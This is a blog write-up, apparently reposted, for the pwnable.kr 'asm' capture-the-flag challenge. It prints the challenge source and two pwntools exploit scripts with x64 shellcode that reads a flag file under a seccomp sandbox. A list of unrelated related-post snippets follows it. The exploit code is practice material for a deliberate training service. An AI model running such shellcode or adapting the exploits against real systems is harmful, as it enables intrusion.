【pwnable】asm之write up
首先查看源代码:
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h>#define LENGTH 128void sandbox(){scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);if (ctx == NULL) {printf("seccomp error\n");exit(0);}seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);if (seccomp_load(ctx) < 0){seccomp_release(ctx);printf("seccomp error\n");exit(0);}seccomp_release(ctx); }char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff"; unsigned char filter[256]; int main(int argc, char* argv[]){setvbuf(stdout, 0, _IONBF, 0);setvbuf(stdin, 0, _IOLBF, 0);printf("Welcome to shellcoding practice challenge.\n");printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");printf("If this does not challenge you. you should play 'asg' challenge :)\n");char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);memset(sh, 0x90, 0x1000);memcpy(sh, stub, strlen(stub));int offset = sizeof(stub);printf("give me your x64 shellcode: ");read(0, sh+offset, 1000);alarm(10);chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmp sandbox();((void (*)(void))sh)();return 0; }
题目中给出了提示:
连接到本地的9026端口,asm正在执行,之后便可拿到flag,而flag所在文件为:
this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong
所以exp如下:
from pwn import * context.log_level = 'debug' context.arch = 'amd64' filename='this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong\0' con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222) p = con.connect_remote('localhost', 9026)#cn = process('./asm') p.recvuntil('shellcode: ')pay = '31c031ff31d2b601be0101010181f6014640400f056a0258bf0101010181f70146404031d2b60431f60f054889c731c031d2b602be0101010181f6014940400f056a01586a015f31d2b603be0101010181f6014940400f05'.decode('hex')p.send(pay) p.send(filename) print p.recvuntil('\x90')
得到结果如下:
附:
exp:
from pwn import *con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222) p = con.connect_remote('localhost', 9026)context(arch='amd64', os='linux')shellcode = '' shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong') shellcode += shellcraft.open('rsp', 0, 0) shellcode += shellcraft.read('rax', 'rsp', 100) shellcode += shellcraft.write(1, 'rsp', 100)# log.info(shellcode)#p.recvuntil('shellcode: ') #p.send(asm(shellcode)) #log.success(p.recvline()) print shellcode print p.recv() p.send(asm(shellcode)) print p.recvline()
2.再用read()将文件内容读取出来
3.最后用write将内容写到屏幕
转载于:https://www.cnblogs.com/liuyimin/p/7496363.html
【pwnable】asm之write up相关推荐
- pwnable.kr asm
看样子是一道和shellcode有关的题目 连上去看看 目录下好像有个说明的文件查看一下 大概意思就是连接到9026端口 asm再特权下执行并get flag 那我们先看一下asm.c #includ ...
- Pwnable之[Toddler's Bottle](三)--asm
Pwnable之[Toddler's Bottle](三)–ASM 提示:我觉得一个黑客应该知道怎么做shellcode 查看代码asm.c的代码 #include <stdio.h> # ...
- pwnable.tw startorw
emm,之前一直想做tw的pwnable苦于没有小飞机(,今天做了一下发现都是比较硬核的pwn题目,对于我这种刚入门?的菜鸡来说可能难度刚好(orz 1.start 比较简单的一个栈溢出,给出一个li ...
- pwnable.kr第七八题 input leg
第七题 input 参考链接: 这道题可太痛苦了,好多知识点: 这里只需要按它的比较走就可以了. 解题过程 第一次比较: 这里只需要让输入的长度为100,并且满足argv['A'].['B']的值即可 ...
- pwnable.kr---leg
pwnable.kr-leg 解题思路 这是一道和asm有关的题,题目提供了源代码..asm文件.flag文件以及leg的可执行文件.虽然leg.c代码比较长,但是关键点只有四处,掌握好四处关键点,就 ...
- 【pwnable.kr】day8:leg
pwnable:leg pwnable.kr:leg 题目链接 question Daddy told me I should study arm. But I prefer to study my ...
- 【pwnable.kr】leg
pwnable从入门到放弃第八题. Download : http://pwnable.kr/bin/leg.c Download : http://pwnable.kr/bin/leg.asm ss ...
- pwnable.kr wp leg
题目 Daddy told me I should study arm. But I prefer to study my leg!Download : http://pwnable.kr/bin/l ...
- pwnable.kr 简单题目详细笔记汇总
文章目录 fd collision bof flag passcode random input leg mistake shellshock coin1 lotto cmd1 cmd2 uaf bl ...
最新文章
- linux fedora35 kvm自定义存储路径
- 用户 'sa' 登录失败。 (Microsoft SQL Server,错误: 18456)
- string数组批量转换成Int数组
- Redis高级实用特性:发布及订阅消息
- 书籍推荐:《C#7.0本质论》
- Zigbee如何在智能家居中成为领先的连接技术?
- mybatis一级,二级缓存。缓存带来的脏读问题
- 404 为什么是 404?
- 人工智能指用计算机,人工智能测试题..doc
- Vijos——T 1016 北京2008的挂钟 || 洛谷—— P1213 时钟
- Android开发之异步消息处理机制AsyncTask
- php 7中文手册pdf版,手册的格式 - PHP 7 中文文档
- SPSS安装多次显示请输入注册的电子邮箱时,采用的解决办法。亲测有效!
- 运用递归来画谢尔宾斯基三角形
- html 用户名正则表达式,独家解密实现:百度账号注册用户名正则表达式验证规则...
- Unity——Animation
- 银行会计学3(特点、核算的前提假设、对象和标准)
- 智能晾衣器全国产化电子元件推荐方案
- 游戏数据后台,kafka代替rsync同步日志数据
- 慎投:这两本期刊被剔除SCI/SSCI, 11月WOS数据库已更新~
热门文章
- python朗读网页-Python带你朗读网页
- 简明python教程txt-Python:将 list 写入一个 txt 文件四种方法
- LeetCode Self Crossing(判断是否相交)
- tar -P参数含义
- review——C# (6)虚方法和覆写方法
- 2.5亿个整数中找出不重复的整数
- C#和SqlServer中处理时间格式问题
- tsql2008技术内幕:tsql语言基础(第3章)
- q160问题,www.q160.com,ie被篡改
- 常用的js验证数字,电话号码,传真,邮箱,手机号码,邮编,日期